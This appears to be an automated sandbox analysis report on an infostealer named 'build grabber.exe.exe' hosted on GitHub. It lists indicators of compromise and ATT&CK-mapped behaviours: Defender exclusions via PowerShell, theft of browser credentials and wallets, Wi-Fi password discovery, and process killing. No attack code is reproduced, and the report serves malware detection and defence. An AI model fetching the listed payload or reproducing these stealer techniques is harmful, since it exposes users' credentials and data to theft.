hxxps://github[.]com/blankgrabberrt/blankgrabberV2[.]033/blob/main/build%20grabber[.]exe[.]exe

Analysis

max time kernel
96s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-12-2024 14:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/blankgrabberrt/blankgrabberV2.033/blob/main/build%20grabber.exe.exe

Score

8^/10

credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6024	powershell.exe
6152	powershell.exe
6648	powershell.exe
5656	powershell.exe
7084	powershell.exe
7676	powershell.exe
8068	powershell.exe
7296	powershell.exe
5700	powershell.exe
6988	powershell.exe
6016	powershell.exe
5140	powershell.exe
6912	powershell.exe
2476	powershell.exe
6984	powershell.exe
3812	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 16 IoCs

pid	Process
4068	build grabber.exe.exe
5148	build grabber.exe.exe
5436	build grabber.exe.exe
5572	build grabber.exe.exe
5284	build grabber.exe.exe
5540	build grabber.exe.exe
5564	build grabber.exe.exe
6044	build grabber.exe.exe
7276	Camera.exe
7232	Camera.exe
5872	Camera.exe
5172	Camera.exe
2320	rar.exe
5940	rar.exe
6656	rar.exe
6424	rar.exe

Loads dropped DLL 64 IoCs

pid	Process
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5148	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5148	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5572	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
5540	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
5572	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe
6044	build grabber.exe.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
40	raw.githubusercontent.com
41	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
61	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 12 IoCs

discovery

Process Discovery

T1057

pid	Process
6388	tasklist.exe
7304	tasklist.exe
7424	tasklist.exe
7944	tasklist.exe
7792	tasklist.exe
8164	tasklist.exe
6092	tasklist.exe
5188	tasklist.exe
6540	tasklist.exe
7576	tasklist.exe
6632	tasklist.exe
5812	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023ce2-218.dat	upx
behavioral1/memory/5148-222-0x00007FFBBF1D0000-0x00007FFBBF63E000-memory.dmp	upx
behavioral1/files/0x0007000000023ce6-224.dat	upx
behavioral1/memory/5148-227-0x00007FFBD1A80000-0x00007FFBD1A90000-memory.dmp	upx
behavioral1/files/0x0007000000023cd7-226.dat	upx
behavioral1/memory/5148-229-0x00007FFBBFB60000-0x00007FFBBFB84000-memory.dmp	upx
behavioral1/files/0x0007000000023ce0-231.dat	upx
behavioral1/memory/5148-232-0x00007FFBCE2F0000-0x00007FFBCE2FF000-memory.dmp	upx
behavioral1/files/0x0007000000023cda-233.dat	upx
behavioral1/memory/5148-238-0x00007FFBBFBB0000-0x00007FFBBFBC9000-memory.dmp	upx
behavioral1/memory/5148-237-0x00007FFBBFA50000-0x00007FFBBFA7D000-memory.dmp	upx
behavioral1/files/0x0007000000023cd6-236.dat	upx
behavioral1/files/0x0007000000023cdd-239.dat	upx
behavioral1/memory/5148-242-0x00007FFBBFA30000-0x00007FFBBFA4F000-memory.dmp	upx
behavioral1/files/0x0007000000023ce5-241.dat	upx
behavioral1/memory/5148-244-0x00007FFBBF7F0000-0x00007FFBBF961000-memory.dmp	upx
behavioral1/files/0x0007000000023cdc-245.dat	upx
behavioral1/memory/5148-249-0x00007FFBBF1D0000-0x00007FFBBF63E000-memory.dmp	upx
behavioral1/memory/5148-251-0x00007FFBCD0E0000-0x00007FFBCD0ED000-memory.dmp	upx
behavioral1/memory/5148-250-0x00007FFBBFA10000-0x00007FFBBFA29000-memory.dmp	upx
behavioral1/files/0x0007000000023ce4-247.dat	upx
behavioral1/files/0x0007000000023cde-252.dat	upx
behavioral1/files/0x0007000000023ce1-256.dat	upx
behavioral1/memory/5148-255-0x00007FFBBF9E0000-0x00007FFBBFA0E000-memory.dmp	upx
behavioral1/files/0x0007000000023cdf-254.dat	upx
behavioral1/memory/5148-262-0x00007FFBBFB60000-0x00007FFBBFB84000-memory.dmp	upx
behavioral1/memory/5148-261-0x00007FFBBEE50000-0x00007FFBBF1C5000-memory.dmp	upx
behavioral1/files/0x0007000000023cd9-265.dat	upx
behavioral1/memory/5148-269-0x00007FFBCB650000-0x00007FFBCB65D000-memory.dmp	upx
behavioral1/memory/5148-268-0x00007FFBBF9C0000-0x00007FFBBF9D4000-memory.dmp	upx
behavioral1/files/0x0007000000023cdb-267.dat	upx
behavioral1/memory/5148-260-0x00007FFBBF730000-0x00007FFBBF7E8000-memory.dmp	upx
behavioral1/memory/5148-301-0x00007FFBBFBB0000-0x00007FFBBFBC9000-memory.dmp	upx
behavioral1/memory/5572-305-0x00007FFBBE9E0000-0x00007FFBBEE4E000-memory.dmp	upx
behavioral1/memory/5148-309-0x00007FFBBE8C0000-0x00007FFBBE9D8000-memory.dmp	upx
behavioral1/memory/5148-308-0x00007FFBBF7F0000-0x00007FFBBF961000-memory.dmp	upx
behavioral1/files/0x0007000000023ce7-307.dat	upx
behavioral1/memory/5148-303-0x00007FFBBFA30000-0x00007FFBBFA4F000-memory.dmp	upx
behavioral1/memory/5572-321-0x00007FFBBF6B0000-0x00007FFBBF6DD000-memory.dmp	upx
behavioral1/memory/5148-322-0x00007FFBBF9E0000-0x00007FFBBFA0E000-memory.dmp	upx
behavioral1/memory/5572-326-0x00007FFBBE740000-0x00007FFBBE8B1000-memory.dmp	upx
behavioral1/memory/5572-330-0x00007FFBC3D00000-0x00007FFBC3D0D000-memory.dmp	upx
behavioral1/memory/5572-332-0x00007FFBBE390000-0x00007FFBBE705000-memory.dmp	upx
behavioral1/memory/5572-333-0x00007FFBBE2D0000-0x00007FFBBE388000-memory.dmp	upx
behavioral1/memory/5572-331-0x00007FFBBE710000-0x00007FFBBE73E000-memory.dmp	upx
behavioral1/memory/5572-329-0x00007FFBBF650000-0x00007FFBBF669000-memory.dmp	upx
behavioral1/memory/5148-327-0x00007FFBBEE50000-0x00007FFBBF1C5000-memory.dmp	upx
behavioral1/memory/5572-325-0x00007FFBBF670000-0x00007FFBBF68F000-memory.dmp	upx
behavioral1/memory/5572-324-0x00007FFBBF690000-0x00007FFBBF6A9000-memory.dmp	upx
behavioral1/memory/5148-323-0x00007FFBBF730000-0x00007FFBBF7E8000-memory.dmp	upx
behavioral1/memory/5572-320-0x00007FFBC7F90000-0x00007FFBC7F9F000-memory.dmp	upx
behavioral1/memory/5572-319-0x00007FFBBF6E0000-0x00007FFBBF704000-memory.dmp	upx
behavioral1/memory/5572-318-0x00007FFBC8F10000-0x00007FFBC8F20000-memory.dmp	upx
behavioral1/memory/5148-317-0x00007FFBBFA10000-0x00007FFBBFA29000-memory.dmp	upx
behavioral1/memory/5572-335-0x00007FFBBE9E0000-0x00007FFBBEE4E000-memory.dmp	upx
behavioral1/memory/5148-338-0x00007FFBBE8C0000-0x00007FFBBE9D8000-memory.dmp	upx
behavioral1/memory/5572-337-0x00007FFBC3C60000-0x00007FFBC3C6D000-memory.dmp	upx
behavioral1/memory/5572-336-0x00007FFBBC9B0000-0x00007FFBBC9C4000-memory.dmp	upx
behavioral1/memory/5540-381-0x00007FFBB4E30000-0x00007FFBB529E000-memory.dmp	upx
behavioral1/memory/5572-380-0x00007FFBBF6E0000-0x00007FFBBF704000-memory.dmp	upx
behavioral1/memory/5540-382-0x00007FFBBBFC0000-0x00007FFBBBFD0000-memory.dmp	upx
behavioral1/memory/5572-383-0x00007FFBBF670000-0x00007FFBBF68F000-memory.dmp	upx
behavioral1/memory/5540-388-0x00007FFBBBED0000-0x00007FFBBBEFD000-memory.dmp	upx
behavioral1/memory/5572-387-0x00007FFBBF650000-0x00007FFBBF669000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Camera.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Camera.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Camera.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Camera.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 8 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
6184	netsh.exe
7484	cmd.exe
7708	cmd.exe
8120	netsh.exe
7296	netsh.exe
7692	cmd.exe
1544	netsh.exe
6744	cmd.exe

Detects videocard installed 1 TTPs 8 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6068	WMIC.exe
5568	WMIC.exe
7144	WMIC.exe
6760	WMIC.exe
6908	WMIC.exe
6312	WMIC.exe
6440	WMIC.exe
6324	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 40 IoCs

evasion

pid	Process
636	taskkill.exe
5496	taskkill.exe
6676	taskkill.exe
5556	taskkill.exe
3316	taskkill.exe
8020	taskkill.exe
7736	taskkill.exe
7808	taskkill.exe
6028	taskkill.exe
5248	taskkill.exe
7916	taskkill.exe
6656	taskkill.exe
8004	taskkill.exe
5680	taskkill.exe
5824	taskkill.exe
7336	taskkill.exe
6356	taskkill.exe
6308	taskkill.exe
7528	taskkill.exe
8012	taskkill.exe
7056	taskkill.exe
6204	taskkill.exe
760	taskkill.exe
5484	taskkill.exe
6800	taskkill.exe
7892	taskkill.exe
5608	taskkill.exe
5128	taskkill.exe
7212	taskkill.exe
7608	taskkill.exe
5936	taskkill.exe
7036	taskkill.exe
7916	taskkill.exe
5472	taskkill.exe
7644	taskkill.exe
5348	taskkill.exe
6668	taskkill.exe
5532	taskkill.exe
7120	taskkill.exe
1408	taskkill.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 907325.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3428	msedge.exe
3428	msedge.exe
4936	msedge.exe
4936	msedge.exe
1928	identity_helper.exe
1928	identity_helper.exe
936	msedge.exe
936	msedge.exe
6024	powershell.exe
6024	powershell.exe
6016	powershell.exe
6016	powershell.exe
6016	powershell.exe
6024	powershell.exe
5140	powershell.exe
5140	powershell.exe
6152	powershell.exe
6152	powershell.exe
6152	powershell.exe
5140	powershell.exe
6648	powershell.exe
6648	powershell.exe
6912	powershell.exe
6912	powershell.exe
2476	powershell.exe
2476	powershell.exe
6912	powershell.exe
6648	powershell.exe
2476	powershell.exe
5656	powershell.exe
5656	powershell.exe
5656	powershell.exe
7084	powershell.exe
7084	powershell.exe
7084	powershell.exe
5640	powershell.exe
5640	powershell.exe
5640	powershell.exe
5640	powershell.exe
7676	powershell.exe
7676	powershell.exe
8068	powershell.exe
8068	powershell.exe
7248	powershell.exe
7248	powershell.exe
7356	powershell.exe
7356	powershell.exe
7676	powershell.exe
7248	powershell.exe
7356	powershell.exe
8068	powershell.exe
7296	powershell.exe
7296	powershell.exe
7296	powershell.exe
6624	powershell.exe
6624	powershell.exe
6624	powershell.exe
6984	powershell.exe
6984	powershell.exe
6984	powershell.exe
3812	powershell.exe
3812	powershell.exe
3812	powershell.exe
5700	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	6100	WMIC.exe
Token: SeSecurityPrivilege	6100	WMIC.exe
Token: SeTakeOwnershipPrivilege	6100	WMIC.exe
Token: SeLoadDriverPrivilege	6100	WMIC.exe
Token: SeSystemProfilePrivilege	6100	WMIC.exe
Token: SeSystemtimePrivilege	6100	WMIC.exe
Token: SeProfSingleProcessPrivilege	6100	WMIC.exe
Token: SeIncBasePriorityPrivilege	6100	WMIC.exe
Token: SeCreatePagefilePrivilege	6100	WMIC.exe
Token: SeBackupPrivilege	6100	WMIC.exe
Token: SeRestorePrivilege	6100	WMIC.exe
Token: SeShutdownPrivilege	6100	WMIC.exe
Token: SeDebugPrivilege	6100	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6100	WMIC.exe
Token: SeRemoteShutdownPrivilege	6100	WMIC.exe
Token: SeUndockPrivilege	6100	WMIC.exe
Token: SeManageVolumePrivilege	6100	WMIC.exe
Token: 33	6100	WMIC.exe
Token: 34	6100	WMIC.exe
Token: 35	6100	WMIC.exe
Token: 36	6100	WMIC.exe
Token: SeDebugPrivilege	6024	powershell.exe
Token: SeDebugPrivilege	6016	powershell.exe
Token: SeDebugPrivilege	6092	tasklist.exe
Token: SeIncreaseQuotaPrivilege	6100	WMIC.exe
Token: SeSecurityPrivilege	6100	WMIC.exe
Token: SeTakeOwnershipPrivilege	6100	WMIC.exe
Token: SeLoadDriverPrivilege	6100	WMIC.exe
Token: SeSystemProfilePrivilege	6100	WMIC.exe
Token: SeSystemtimePrivilege	6100	WMIC.exe
Token: SeProfSingleProcessPrivilege	6100	WMIC.exe
Token: SeIncBasePriorityPrivilege	6100	WMIC.exe
Token: SeCreatePagefilePrivilege	6100	WMIC.exe
Token: SeBackupPrivilege	6100	WMIC.exe
Token: SeRestorePrivilege	6100	WMIC.exe
Token: SeShutdownPrivilege	6100	WMIC.exe
Token: SeDebugPrivilege	6100	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6100	WMIC.exe
Token: SeRemoteShutdownPrivilege	6100	WMIC.exe
Token: SeUndockPrivilege	6100	WMIC.exe
Token: SeManageVolumePrivilege	6100	WMIC.exe
Token: 33	6100	WMIC.exe
Token: 34	6100	WMIC.exe
Token: 35	6100	WMIC.exe
Token: 36	6100	WMIC.exe
Token: SeDebugPrivilege	5188	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5520	WMIC.exe
Token: SeSecurityPrivilege	5520	WMIC.exe
Token: SeTakeOwnershipPrivilege	5520	WMIC.exe
Token: SeLoadDriverPrivilege	5520	WMIC.exe
Token: SeSystemProfilePrivilege	5520	WMIC.exe
Token: SeSystemtimePrivilege	5520	WMIC.exe
Token: SeProfSingleProcessPrivilege	5520	WMIC.exe
Token: SeIncBasePriorityPrivilege	5520	WMIC.exe
Token: SeCreatePagefilePrivilege	5520	WMIC.exe
Token: SeBackupPrivilege	5520	WMIC.exe
Token: SeRestorePrivilege	5520	WMIC.exe
Token: SeShutdownPrivilege	5520	WMIC.exe
Token: SeDebugPrivilege	5520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5520	WMIC.exe
Token: SeRemoteShutdownPrivilege	5520	WMIC.exe
Token: SeUndockPrivilege	5520	WMIC.exe
Token: SeManageVolumePrivilege	5520	WMIC.exe
Token: 33	5520	WMIC.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 2468	4936	msedge.exe	83
PID 4936 wrote to memory of 2468	4936	msedge.exe	83
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 2360	4936	msedge.exe	84
PID 4936 wrote to memory of 3428	4936	msedge.exe	85
PID 4936 wrote to memory of 3428	4936	msedge.exe	85
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86
PID 4936 wrote to memory of 408	4936	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/blankgrabberrt/blankgrabberV2.033/blob/main/build%20grabber.exe.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbd1d246f8,0x7ffbd1d24708,0x7ffbd1d24718
  2⤵
  PID:2468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:2360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
  2⤵
  PID:408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
  2⤵
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
  2⤵
  PID:4868
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
  2⤵
  PID:4044
